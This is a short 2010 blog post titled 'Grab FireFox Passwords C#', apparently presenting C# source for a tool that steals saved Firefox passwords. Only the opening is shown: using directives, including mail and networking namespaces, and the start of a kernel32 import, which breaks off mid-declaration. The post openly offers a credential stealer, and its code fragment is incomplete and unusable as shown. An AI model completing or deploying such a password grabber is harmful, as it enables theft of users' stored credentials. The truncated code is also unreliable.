Thursday, May 6, 2010

Grab FireFox Passwords C#

Title: Grab FireFox Passwords.Language: C#------------------------------------------------------------------------------------------------------------using System;using System.Collections.Generic;using System.IO;using System.Net.Mail;using System.Net;using System.Text;using System.Runtime.InteropServices;namespace ConsoleApplication1{class Program{[DllImport("kernel32.dll")]public static extern

No comments:

Post a Comment